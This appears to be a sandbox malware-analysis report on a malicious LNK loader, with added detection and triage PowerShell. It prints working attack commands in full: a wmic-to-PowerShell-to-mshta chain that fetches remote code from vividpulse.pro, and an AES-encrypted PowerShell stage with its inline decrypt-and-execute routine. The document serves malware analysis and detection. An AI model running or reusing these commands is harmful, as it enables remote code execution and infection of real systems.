Source: powershell.exe, 00000009.00000002.2333960196.0000021D9FFAE000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://vividpulse.pro/Quantum/XZJKPUBX.ms
Source: powershell.exe, 00000009.00000002.2333960196.0000021D9FFAE000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://vividpulse.pro/Quantum/XZJKPUBX.msi
Source: mshta.exe, 00000006.00000002.2508634004.0000024865690000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000003.2488150003.000002506C06F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000002.2508521334.00000248653BB000.00000004.00000020.00020000.00000000.sdmp, GYede3Gwn0.lnk; String found in binary or memory: https://vividpulse.pro/Seed/Havoc
Source: powershell.exe; String found in binary or memory: https://vividpulse.pro/Seed/Havoc$global:?
Source: mshta.exe, 00000006.00000003.2487930786.000002486532B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000003.2487703916.000002486530D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000002.2508342660.000002486532C000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: https://vividpulse.pro/Seed/Havoc)8x
Source: mshta.exe, 00000006.00000003.2486953315.0000025067F7D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000002.2509397222.0000025067F7D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000003.2507637529.0000025067F7D000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: https://vividpulse.pro/Seed/Havoc...
Source: mshta.exe, 00000006.00000003.2486953315.0000025067F56000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000003.2507637529.0000025067F57000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000002.2509397222.0000025067F58000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: https://vividpulse.pro/Seed/Havoc...8j
Source: mshta.exe, 00000006.00000003.2486953315.0000025067F7D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000002.2509397222.0000025067F7D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000003.2507637529.0000025067F7D000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: https://vividpulse.pro/Seed/Havoc1
Source: mshta.exe, 00000006.00000002.2508410347.000002486536B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000003.2486499146.0000024865368000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: https://vividpulse.pro/Seed/Havoc9r
Source: mshta.exe, 00000006.00000002.2508221682.00000248652D0000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: https://vividpulse.pro/Seed/HavocC
Source: mshta.exe, 00000006.00000003.2486499146.00000248653BB000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000003.2506163477.00000248653BB000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000002.2508221682.00000248652D0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000003.2506268055.00000248653BB000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000002.2508521334.00000248653BB000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: https://vividpulse.pro/Seed/HavocC:
Source: mshta.exe, 00000006.00000002.2508719891.0000024866CB0000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://vividpulse.pro/Seed/HavocH
Source: powershell.exe, 00000005.00000002.2176748936.0000024DD96E9000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://vividpulse.pro/Seed/HavocP
Source: mshta.exe, 00000006.00000002.2508221682.00000248652D0000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: https://vividpulse.pro/Seed/HavocV
Source: powershell.exe, 00000005.00000002.2176502931.0000024DD7560000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: https://vividpulse.pro/Seed/HavocVBS;.VBE;.
Source: mshta.exe, 00000006.00000003.2487930786.000002486532B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000003.2487703916.000002486530D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000002.2508342660.000002486532C000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: https://vividpulse.pro/Seed/HavocW0
Source: mshta.exe, 00000006.00000003.2488150003.000002506C06F000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: https://vividpulse.pro/Seed/HavocYmsz9
Source: mshta.exe, 00000006.00000002.2510242583.000002506C107000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000003.2507575546.000002506C105000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000003.2488097868.000002506C104000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: https://vividpulse.pro/Seed/HavoccoLMEMHX
Source: mshta.exe, 00000006.00000003.2497045401.000002506DB25000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://vividpulse.pro/Seed/Havochttps://vividpulse.pro/Seed/Havoc
Source: mshta.exe, 00000006.00000002.2508221682.00000248652D0000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: https://vividpulse.pro/Seed/Havocl
Source: powershell.exe, 00000005.00000002.2176748936.0000024DD9241000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://vividpulse.pro/Seed/Havocp
Source: mshta.exe, 00000006.00000002.2508221682.00000248652D0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://vividpulse.pro/Seed/Havocq
Source: powershell.exe, 00000005.00000002.2174817634.0000024DD7392000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://vividpulse.pro/Seed/Havocrs
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49711
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49743
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49731
Source: unknown | Network traffic detected: HTTP traffic on port 49731 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49711 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49743 -> 443
Source: unknown | HTTPS traffic detected: 92.113.18.193:443 -> 192.168.2.6:49711 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 92.113.18.193:443 -> 192.168.2.6:49731 version: TLS 1.2

System Summary

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\Havoc[1], type: DROPPED | Matched rule: Emmenhtal Loader string Author: Sekoia.io
Source: WMIC.exe, 00000000.00000002.2150289412.000002B78BA2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: ows\System32\Wbem\wmic.exe" process call create "powershell -w 1 powershell -Command ('ms' + 'hta' + '.exe ' + 'https://vividpulse.pro/Seed/Havoc')" memstr_a43211bc-c
Source: GYede3Gwn0.lnk | LNK file: process call create "powershell -w 1 powershell -Command ('ms' + 'hta' + '.exe ' + 'https://vividpulse.pro/Seed/Havoc')"
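The LNK command line above is the whole initial-access chain in one string: wmic.exe `process call create` hands the real command to WMI so that PowerShell is not launched directly by the shortcut, and the concatenation `('ms' + 'hta' + '.exe ')` keeps the literal token `mshta` out of the command line until PowerShell evaluates it, which defeats a plain substring match on the WMIC or first PowerShell process. As an added example (mine, not part of the report and not the loader's code), the following PowerShell folds that concatenation back together and runs chain rules over constructed Sysmon Event ID 1 style records; the command lines are taken from this report, while the process IDs, the explorer.exe parent, the field names and the benign control record are assumptions for the demo.

```powershell
# Added example (not from the report): detection logic for the chain
#   LNK -> wmic.exe "process call create" -> powershell -> mshta <URL> -> powershell (AES stage)
# run over CONSTRUCTED Sysmon Event ID 1 style records. Command lines come from
# the report; ProcessId values, the explorer.exe parent and the benign record
# are assumptions.

function Expand-StringConcat {
    param([Parameter(Mandatory)][string]$CommandLine)
    # Fold PowerShell string concatenation ('ms' + 'hta' + '.exe ') into one
    # literal so the token a naive 'mshta' substring match misses reappears.
    # Assumption: single-quoted fragments joined with '+'; nested quoting is not handled.
    $pair = "'([^']*)'\s*\+\s*'([^']*)'"
    $glue = "'" + '$1$2' + "'"
    $s = $CommandLine
    do { $before = $s; $s = $s -replace $pair, $glue } while ($s -ne $before)
    # ('mshta.exe https://...')  ->  mshta.exe https://...
    return ($s -replace "\(\s*'([^']*)'\s*\)", '$1')
}

function Test-LnkWmicMshtaChain {
    param([Parameter(Mandatory)][object[]]$Events)
    foreach ($e in $Events) {
        $norm  = Expand-StringConcat $e.CommandLine
        $rules = @()
        if ($e.Image -like '*\wmic.exe' -and $norm -match 'process\s+call\s+create' -and $norm -match 'powershell') {
            $rules += 'wmic_process_call_create_powershell'
        }
        if ($e.Image -like '*\powershell.exe' -and $norm -match 'mshta(\.exe)?\s+https?://') {
            $rules += 'powershell_launches_mshta_url'
        }
        if ($e.Image -like '*\mshta.exe' -and $norm -match '\shttps?://') {
            $rules += 'mshta_remote_hta'
        }
        if ($e.ParentImage -like '*\mshta.exe' -and $e.Image -like '*\powershell.exe' -and
            $norm -match '-ep\s+Unrestricted' -and $norm -match 'Cryptography\.Aes') {
            $rules += 'mshta_child_powershell_aes_stage'
        }
        if ($rules.Count -gt 0) {
            [pscustomobject]@{ ProcessId = $e.ProcessId; Image = $e.Image; Rules = ($rules -join ', ') }
        }
    }
}

# --- Constructed records (command lines from the report, everything else assumed) ---
$ps = 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe'
$wmicCmd = @'
"C:\Windows\System32\Wbem\wmic.exe" process call create "powershell -w 1 powershell -Command ('ms' + 'hta' + '.exe ' + 'https://vividpulse.pro/Seed/Havoc')"
'@
$ps1Cmd   = "powershell -w 1 powershell -Command ('ms' + 'hta' + '.exe ' + 'https://vividpulse.pro/Seed/Havoc')"
$ps2Cmd   = "`"$ps`" -Command `"mshta.exe https://vividpulse.pro/Seed/Havoc`""
$mshtaCmd = '"C:\Windows\system32\mshta.exe" https://vividpulse.pro/Seed/Havoc'
# AES stage; the hex blob is replaced by '...' here, the real one is in the report.
$ps3Cmd   = "`"$ps`" -w 1 -ep Unrestricted -nop `$ddg = '...';`$xwh = [System.Security.Cryptography.Aes]::Create();"

$events = @(
    [pscustomobject]@{ ProcessId = 100; Image = 'C:\Windows\System32\wbem\WMIC.exe'; ParentImage = 'C:\Windows\explorer.exe';           CommandLine = $wmicCmd }
    [pscustomobject]@{ ProcessId = 101; Image = $ps;                                 ParentImage = 'C:\Windows\System32\wbem\WMIC.exe'; CommandLine = $ps1Cmd }
    [pscustomobject]@{ ProcessId = 102; Image = $ps;                                 ParentImage = $ps;                                 CommandLine = $ps2Cmd }
    [pscustomobject]@{ ProcessId = 103; Image = 'C:\Windows\System32\mshta.exe';     ParentImage = $ps;                                 CommandLine = $mshtaCmd }
    [pscustomobject]@{ ProcessId = 104; Image = $ps;                                 ParentImage = 'C:\Windows\System32\mshta.exe';     CommandLine = $ps3Cmd }
    [pscustomobject]@{ ProcessId = 105; Image = $ps;                                 ParentImage = 'C:\Windows\explorer.exe';           CommandLine = 'powershell -Command Get-Date' }  # benign control
)

# The evasion in one line: the raw text never contains 'mshta', the folded text does.
"raw contains mshta: {0}; folded contains mshta: {1}" -f ($wmicCmd -match 'mshta'), ((Expand-StringConcat $wmicCmd) -match 'mshta')

# Expected: records 100..104 each hit one rule, record 105 hits none.
Test-LnkWmicMshtaChain -Events $events | Format-Table -AutoSize
```

Each hop is matched on its own command line rather than on the parent link for the WMI hop on purpose: in real Sysmon telemetry the PowerShell created through Win32_Process.Create is normally a child of WmiPrvSE.exe, not of wmic.exe, so a rule that only looks for wmic.exe as the parent of powershell.exe would miss it even though this sandbox attributes the creation to WMIC.exe.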
Source: C:\Windows\System32\svchost.exe | File created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 5_2_00007FFD345416BF
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 5_2_00007FFD3454203D
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 9_2_00007FFD331762A5
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 9_2_00007FFD331762EC
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 9_2_00007FFD331729FA
Source: C:\Windows\System32\mshta.exe | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE
Source: C:\Windows\System32\mshta.exe | Process created: Commandline size = 2590
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\Havoc[1], type: DROPPED | Matched rule: emmenhtal_strings_hta_exe author = Sekoia.io, description = Emmenhtal Loader string, creation_date = 2024-09-06, classification = TLP:CLEAR, version = 1.0, id = 64e08610-e8a4-4edd-8f6b-d4e8d2b47d87, hash = e86a22f1c73b85678e64341427c7193ba65903f3c0f29af2e65d7c56d833d912
Source: classification engine | Classification label: mal100.evad.winLNK@28/62@2/2
Source: C:\Windows\System32\mshta.exe | File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\Havoc[1]
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Mutant created: NULL
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2056:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4836:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_n1ni4u3u.rn0.ps1
Source: C:\Windows\System32\wbem\WMIC.exe | WMI Queries: IWbemServices::ExecMethod - ROOT\CIMV2 : Win32_Process::Create
Source: C:\Windows\System32\conhost.exe | File read: C:\Users\desktop.ini
Source: C:\Windows\System32\wbem\WMIC.exe | Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: GYede3Gwn0.lnk | ReversingLabs: Detection: 18%
Source: GYede3Gwn0.lnk | Virustotal: Detection: 25%
Source: unknown | Process created: C:\Windows\System32\wbem\WMIC.exe "C:\Windows\System32\Wbem\wmic.exe" process call create "powershell -w 1 powershell -Command ('ms' + 'hta' + '.exe ' + 'https://vividpulse.pro/Seed/Havoc')"
Source: C:\Windows\System32\wbem\WMIC.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\wbem\WMIC.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 powershell -Command ('ms' + 'hta' + '.exe ' + 'https://vividpulse.pro/Seed/Havoc')
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "mshta.exe https://vividpulse.pro/Seed/Havoc"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\mshta.exe "C:\Windows\system32\mshta.exe" https://vividpulse.pro/Seed/Havoc
Source: unknown | Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
Source: C:\Windows\System32\mshta.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop $ddg = '14D9E273DBAAF2D5627390C488D4081506BACF9BB631E3BFB99E89402396A70A33B769921D8E13B74BFE560E44E9EA80141571C8144B00F8DFD5B812560521E806858FABDD53F92FF1AF58107B7325097243441EB3D0B85776CB99DBB0477D42CBA9E543DE9D42C27F5C52600E9295D684A3A713292FD7590D5A9D93A1C7A8C449DA6B94034EF5C0876C666B9AF696CB12928616D0C543FDF4FA01CD781A0FD3E27C492347CD5958399225168576CBA1BCF230F43AF6432BD57AE6B38C04EF2A370A6A7A9217AF16A8216F99E4E18DF0865A002FCA560819251C521CBC36B7AF93394D9C3B2BF598BCA8B7E7AF02167AA470C45A1CCE0FCFCAF7F27ABD86382030EE615D8E88E22FE52ED3BE7920C11B0D69789B0869401C0E48DD6B755FE432D03A5A497E5F28EB5E5E44FAFA0C505E6623DFE084696F472CA065C02C263ECEB0AFAD35CE69BFF06ABA1F5B3F0DDA7BA73DD774EB332B541081F516B8571C7AF7673AF3AF66AAB18B80B1E88EE0C7484102BEA4492A97B93C9B25CD23C59C0C19974EE48483A82F0A3DACE4B86F4ACDF9EBD8241CFE51CFACA8304C421249AC1ED97B0130EE35D8024FC019004642A1048544B0EFD18F4AB33955150BB878898726DB416D04B2F38F5D64DC34581D0D970265A7861A50C84E3ED14B3B80F48DC0B376FEF3EC7781DB3ABF08D8CA09272DF1FDFB6A49276F6B84EB85FD08DE40DCECA35D65C7E4C6AF03BD30E2758EA776531B78AC2A0CDB1152B752476FCA117CF49836F1D3F580C7F1EFCC3DF72889A84719CD9CB0906E4426AB5B5ACB90919BB40912D707A2EDBFDF4CA474944334791F9CDE97423D874DEC32D3F51D82D569C9BA9BE15F8C8F45EE5E616DC1ACCF500C07D6397B43D0B7996460B9038754E3BB20065A84C5A0AB1BEA09C08F010390D6CF29034533915FF9B0CDA4E962B0C9526FAEDC4C92583151324317EA1F41668164916EF83A708D49D8D387F3A6FC03B4C45B55CC791633A903C424CC97F360459144E8AAAD18846EDE332AC9D0B0A5DA3942E80D30BC64A79D4F1066CBD427AA9967B032410489BF58E552EABE4E56233E9E617DE26D133799620ABDC2C8A7EE07F161DA0B795BA67A3C330626C5EBCE6DE7CBCBDE927A136CE05FA8D0FA0B1EF5B5F880F8C60B77244C5127D2CF5185955BF12936D162404DCA8452A25052A660077FFA7A581AB5764BFCAFF5EA0E35B323E6B1212E76F58B5497A0D17148E38EB53E7C5672804D7F7F5586A4B9AF992E86A8D5D91729BF16373AB1737376149212ECA57D5C01799429867A591B0FC2F74593A7BBE6DBE58B9B2F9AECE6EEDE50D4794DF2C26135D7C1C53695C710B56DB6E7DC5F0DC736A8F4359B0423D09AE8D87A4BBD3D064D552CFC81D3BD7BF66DAE7DB9F7EBA548845AFEE275E29141FBC37007DC1C4C7D51463745ED37544877624C78476D755254597868556F';function YoR ($pAJaWh){return -split ($pAJaWh -replace '..', '0x$& ')};$YaSAQhF = YoR($ddg.SubString(0, 2048));$xwh = [System.Security.Cryptography.Aes]::Create();$xwh.Key = YoR($ddg.SubString(2048));$xwh.IV = New-Object byte[] 16;$rRodUdSQ = $xwh.CreateDecryptor();$Jpgioi = [System.String]::new($rRodUdSQ.TransformFinalBlock($YaSAQhF, 0,$YaSAQhF.Length)); sal fd $Jpgioi.Substring(3,3); fd $Jpgioi.Substring(6)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\AppData\Roaming\API _Guide.pdf"
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe | Process created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe | Process created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --user-data-dir="C:\Users\user\AppData\Local\CEF\User Data" --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2084 --field-trial-handle=1720,i,4098495586832086612,16880335015844126518,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8
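The powershell.exe that mshta.exe spawns carries its whole next stage inline in the command line above: `$ddg` is a hex string whose first 2048 characters are 1024 bytes of AES ciphertext and whose remainder is the key; `YoR` rewrites each hex pair as `0x..` and splits it into bytes; `Aes.Create()` yields CBC with PKCS7 padding; the IV is 16 zero bytes; the decrypted bytes are widened byte-for-char into a string; characters 3..5 of that string become the target of an alias `fd` (a three-character command name such as iex) and everything from offset 6 onward is passed to it. The trailing 32 hex characters of the blob decode to 16 printable ASCII bytes, which is consistent with an AES-128 key. As an added example (mine, not the report's and not the loader's code), the following PowerShell reproduces that decryption as a triage step that returns the next stage instead of running it, and self-tests on a constructed blob; the helper names are mine, the 2048-character split, zero IV and AES defaults mirror the observed command line.

```powershell
# Added example (not from the report and not the loader's own code): decrypt the
# Emmenhtal-style PowerShell stage WITHOUT executing it. Helper names are mine;
# the 2048-character split, the zero IV and Aes.Create() defaults mirror the
# observed command line.

function ConvertFrom-HexString {
    param([Parameter(Mandatory)][string]$Hex)
    # Same effect as the loader's YoR(): each pair of hex digits becomes one byte.
    $bytes = New-Object byte[] ([int]($Hex.Length / 2))
    for ($i = 0; $i -lt $bytes.Length; $i++) {
        $bytes[$i] = [Convert]::ToByte($Hex.Substring(2 * $i, 2), 16)
    }
    return ,$bytes
}

function ConvertFrom-EmmenhtalStage {
    # Blob layout as in the report: hex(ciphertext, 1024 bytes) + hex(key).
    # Aes.Create() defaults to CBC + PKCS7; the loader sets IV = 16 zero bytes.
    # The loader then runs:  sal fd $plain.Substring(3,3); fd $plain.Substring(6)
    # i.e. chars 3..5 name the command and the remainder is the script handed to it.
    # We return both and run nothing.
    param(
        [Parameter(Mandatory)][string]$Blob,
        [int]$CipherHexLength = 2048   # matches $ddg.SubString(0, 2048) in the sample
    )
    $cipher = ConvertFrom-HexString $Blob.Substring(0, $CipherHexLength)
    $key    = ConvertFrom-HexString $Blob.Substring($CipherHexLength)

    $aes = [System.Security.Cryptography.Aes]::Create()
    try {
        $aes.Key = $key
        $aes.IV  = New-Object byte[] 16
        $plainBytes = $aes.CreateDecryptor().TransformFinalBlock($cipher, 0, $cipher.Length)
    } finally { $aes.Dispose() }

    # [System.String]::new(byte[]) in the loader widens each byte to a char; do the same.
    $plain = -join ($plainBytes | ForEach-Object { [char]$_ })
    [pscustomobject]@{
        CommandName = $plain.Substring(3, 3)    # what 'sal fd ...' would alias
        Payload     = $plain.Substring(6)       # what that alias would be invoked on
        KeyAscii    = -join ($key | ForEach-Object { [char]$_ })
    }
}

# --- Offline self-test on a CONSTRUCTED blob (not the sample's) ---------------
function New-ConstructedStage {
    param([Parameter(Mandatory)][string]$Script, [string]$KeyAscii = 'Sixteen byte key')  # 16 ASCII bytes = AES-128
    # Three filler chars + 'iex' like the real layout; pad to 1020 bytes so PKCS7
    # makes the ciphertext exactly 1024 bytes and the default 2048-char split works.
    $plain = ('###iex' + $Script).PadRight(1020)
    $aes = [System.Security.Cryptography.Aes]::Create()
    try {
        $aes.Key = [System.Text.Encoding]::ASCII.GetBytes($KeyAscii)
        $aes.IV  = New-Object byte[] 16
        $pb = [System.Text.Encoding]::ASCII.GetBytes($plain)
        $cb = $aes.CreateEncryptor().TransformFinalBlock($pb, 0, $pb.Length)
        return ([System.BitConverter]::ToString([byte[]]($cb + $aes.Key))) -replace '-', ''
    } finally { $aes.Dispose() }
}

$blob  = New-ConstructedStage -Script 'Write-Output "this is where the next stage would run"'
$stage = ConvertFrom-EmmenhtalStage -Blob $blob
# Expected: command iex, payload = the constructed script
"command: {0}`npayload: {1}`nkey: {2}" -f $stage.CommandName, $stage.Payload.Trim(), $stage.KeyAscii
```

To apply it to the sample, pass the full `$ddg` value from the command line above as `-Blob` and read `$stage.Payload`; a padding exception from `TransformFinalBlock` means the blob was copied incomplete (the report wraps it) or the split offset is not 2048. The alias trick is worth noting for detection: the decrypted script never contains the string `Invoke-Expression`, only the three characters at offset 3, so hunting for the stage should key on the `sal` + `Substring` pattern and on the inline AES setup rather than on the usual `iex` strings.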
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: unknown unknown
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe | Process created: unknown unknown
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe | Process created: unknown unknown
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe | Process created: unknown unknown
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe | Process created: unknown unknown
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe | Process created: unknown unknown
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe | Process created: unknown unknown
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe | Process created: unknown unknown
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe | Process created: unknown unknown
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe | Process created: unknown unknown
Source: C:\Windows\System32\wbem\WMIC.exe | Sections loaded (in load order): iphlpapi.dll, framedynos.dll, sspicli.dll, kernel.appcore.dll, wbemcomn.dll, msxml6.dll, urlmon.dll, iertutil.dll, srvcli.dll, netutils.dll, uxtheme.dll, vcruntime140.dll, vcruntime140_1.dll, amsi.dll, userenv.dll, profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Sections loaded (in load order): atl.dll, mscoree.dll, kernel.appcore.dll, version.dll, vcruntime140_clr0400.dll, ucrtbase_clr0400.dll, ucrtbase_clr0400.dll, cryptsp.dll, rsaenh.dll, cryptbase.dll, amsi.dll, userenv.dll, profapi.dll, windows.storage.dll, wldp.dll, msasn1.dll, gpapi.dll, msisip.dll, wshext.dll, appxsip.dll, opcservices.dll, secur32.dll, sspicli.dll, uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Sections loaded (in load order, second powershell.exe instance): atl.dll, mscoree.dll, kernel.appcore.dll, version.dll, vcruntime140_clr0400.dll, ucrtbase_clr0400.dll, cryptsp.dll, rsaenh.dll, cryptbase.dll, amsi.dll, userenv.dll, profapi.dll, windows.storage.dll, wldp.dll, msasn1.dll, msisip.dll, wshext.dll, appxsip.dll, opcservices.dll, gpapi.dll, secur32.dll, sspicli.dll, uxtheme.dll
Source: C:\Windows\System32\mshta.exe | Sections loaded (in load order): wldp.dll, mshtml.dll, iertutil.dll, sspicli.dll, powrprof.dll, winhttp.dll, wkscli.dll, netutils.dll, umpdc.dll, urlmon.dll, srvcli.dll, kernel.appcore.dll, msiso.dll, uxtheme.dll, srpapi.dll, wininet.dll, windows.storage.dll, wldp.dll, profapi.dll, ondemandconnroutehelper.dll, mswsock.dll, iphlpapi.dll, winnsi.dll, ieframe.dll, netapi32.dll, version.dll, userenv.dll, msimtf.dll, dxgi.dll, resourcepolicyclient.dll, dnsapi.dll, textinputframework.dll, coreuicomponents.dll, coremessaging.dll, ntmarta.dll, wintypes.dll, wintypes.dll, wintypes.dll, rasadhlp.dll, dataexchange.dll, d3d11.dll, dcomp.dll, twinapi.appcore.dll, fwpuclnt.dll, schannel.dll, mskeyprotect.dll, ntasn1.dll, msasn1.dll, dpapi.dll, cryptsp.dll, rsaenh.dll, cryptbase.dll, gpapi.dll, ncrypt.dll, ncryptsslp.dll, imgutil.dll, msls31.dll, d2d1.dll, dwrite.dll, d3d10warp.dll, dxcore.dll, mlang.dll, textshaping.dll, jscript9.dll, mpr.dll, scrrun.dll, sxs.dll, propsys.dll, edputil.dll, windows.staterepositoryps.dll, appresolver.dll, bcp47langs.dll, slc.dll, sppc.dll, onecorecommonproxystub.dll, onecoreuapcommonproxystub.dll
Source: C:\Windows\System32\svchost.exe | Sections loaded (in load order): kernel.appcore.dll, qmgr.dll, bitsperf.dll, powrprof.dll, xmllite.dll, firewallapi.dll, esent.dll, umpdc.dll, dnsapi.dll, iphlpapi.dll, fwbase.dll, wldp.dll, ntmarta.dll, profapi.dll, flightsettings.dll, policymanager.dll, msvcp110_win.dll, netprofm.dll, npmproxy.dll, bitsigd.dll, upnp.dll, winhttp.dll, ssdpapi.dll, urlmon.dll, iertutil.dll, srvcli.dll, netutils.dll, appxdeploymentclient.dll, cryptbase.dll, wsmauto.dll, miutils.dll, wsmsvc.dll, dsrole.dll, pcwum.dll, mi.dll, userenv.dll, gpapi.dll, winhttp.dll, wkscli.dll, netutils.dll, sspicli.dll, ondemandconnroutehelper.dll, msv1_0.dll, ntlmshared.dll, cryptdll.dll, webio.dll, mswsock.dll, winnsi.dll, rasadhlp.dll, fwpuclnt.dll, rmclient.dll, usermgrcli.dll, execmodelclient.dll, propsys.dll, coremessaging.dll, twinapi.appcore.dll, onecorecommonproxystub.dll, execmodelproxy.dll, resourcepolicyclient.dll, vssapi.dll, vsstrace.dll, samcli.dll, samlib.dll, es.dll, bitsproxy.dll, ondemandconnroutehelper.dll, dhcpcsvc6.dll, dhcpcsvc.dll
